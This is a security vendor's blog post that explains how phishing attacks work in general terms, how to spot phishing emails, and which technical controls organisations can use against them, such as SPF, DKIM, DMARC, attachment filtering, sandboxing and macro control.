Phishing: How to stop a malicious email in its tracks

01 Nov 2019

About the author

Yusuf Mustafa Yusuf Mustafa is a Cybersecurity Consultant at Arrow.

Based at Arrow’s Sydney office, Yusuf is passionate about protecting our way of life in the digital age by delivering security solutions that provide end user visibility and control.

 


Australian National University and regional hospitals and health care providers in Victoria are among the most recent to have fallen victim to a spate of significant data breaches. The breaches have one thing in common: they were all instigated by phishing attacks.

The Australian Cyber Security Centre has issued an alert on a widespread malware campaign known as Emotet: A Trojan virus delivered via emails sent with malicious attachments.

Given such a high success rate, it’s no surprise that phishing is the no. 1 choice for social engineers to launch an attack.

So what is phishing, and why are they so successful? In this blog, I’ll demonstrate what a phishing attack looks like and how organisations can mitigate risk.

Phishing

Phishing: The cyber weapon of choice

Phishing is a technique where emails are used as a weapon by cyber criminals. It’s a social engineering technique used to trick a user into clicking a link, downloading an attachment or sharing information.

Having proven so successful, phishing has quickly spread beyond emails to include VoIP (over the telephone, voice phishing) and unsolicited text messages (SMS and IM). Attackers often send messages to their target, pretending to be a trusted entity by using a real person’s name or company.

Individuals are lured into either providing sensitive data or downloading email attachments that are used to deliver malware which then leads to system hijacking, ransomware attacks, crypto mining etc.

Thinking like a phisher

There are many tactics phishers use to execute their attacks. The first thing they’ll be looking for is knowledge. After all, knowledge is power.

Crafting the perfect phishing emails

  1. Recon (reconnaissance). This is the first and most important step. A good social engineer is going to spend a lot of time doing recon to determine the system vulnerabilities and active email addresses, and to match their identities.
  2. Education. The attacker will then educate themselves about the phishing target and understanding how the company works. They’ll look to identify the employees, contractors and will even go as far as to identify the causes the company supports.

Common phishing tricks

  1. Spoofing the sender (alias or email)
  2. Spoofing website URLs
  3. Cloning websites
  4. Human psychology.

Phishing in action

Check out the following short video to see what happens during a phishing attack, from the attacker’s and the victim’s side.

Email security standards are just the beginning

Organisations can reduce the likelihood of a phishing attack through cybersecurity awareness training that puts people at the centre of the solution.

Check out this blog to learn how to go about this.

However, at the bare minimum, businesses of all sizes should have these technical controls in place:

  • Sender Policy Framework (SPF) and Domain-based Message Authentication
  • Reporting and Conformance (DMARC) records in DNS
  • DMARC with DomainKeys Identified Mail (DKIM) to sign emails.

Arrow can help demystify the complexity in implementing these controls.

Talk to us today for support.

Advanced mitigation strategies

There is a wealth of information available on how to spot a phishing email. In general, it pays to look out for the following:

  • A sense of urgency/fear tactics
  • Imitating known brands
  • Fake email addresses
  • Rollover shows malicious link
  • Copyright data is incorrect
  • Email contains a ZIP file or a PDF attachment, to name a few.

The following list offers more advanced mitigation strategies for the security risk posed by malicious emails.

Attachment filtering: convert attachments to another format (i.e. Microsoft Word document to PDF).

Whitelist attachments based on file typing: File typing inspects the content of a file to determine its file type rather than relying on its extension.

Block password-protect archives and unidentifiable or encrypted attachments: Content within password protected archives can’t be trusted since email content filters can’t decrypt and inspect their contents.

Perform automated dynamic analysis of attachments run in a sandbox: Dynamic analysis uses behaviour-based detection capabilities instead of relying on the use of signatures, enabling organisations to detect malware that has yet to be identified by vendors.

Sanitise attachments to remove active or potentially harmful content: Active content, such as macros in Microsoft Office files and JavaScript, should be removed from within attachments before being delivered to users.

Disable or control macros in Microsoft Office files: The use of macros in Microsoft Office files being used as a malware delivery vector. These macros are written in the Visual Basic for Applications (VBA) programming language – a feature built into Microsoft Office applications. Macros are commonly used for task automation, however adversaries are also using macros to perform a variety of malicious activities including the download and execution of malware on the host computer.

Controlled inspection of archive files: Archive files can be used to bypass poorly configured email content filters. By placing a malicious file in an archive file and sending it to the target, the archive file might bypass content filtering checks.

Scan attachments using antivirus software: Attachments should be scanned using vendor-supported antivirus software with up-to-date signatures, reputation ratings and other heuristic detection capabilities.

Replace active web addresses in an email’s body with non-active versions: An active web address allows users to click on a hyperlink in the body of an email and be taken to a specified website. Active web addresses can appear to be safe but can actually direct users to a malicious website. Hovering over the address may reveal the actual website.

Remove active content in an email’s body: Emails with active content such as VBScript or JavaScript pose a security risk if the email client or web browser in organisations where web mail is utilised is capable of running the active content.

Companies are nearly three times more likely to get breached by social attacks than via actual vulnerabilities – Verizon 2018 DBIR report.

Given the success rate, it seems phishing shows no sign of slowing.

At Arrow, we deliver leading security technologies and end-to-end enablement to help channel partners take their security solutions to market.

Talk to us today to learn more about our security capabilities.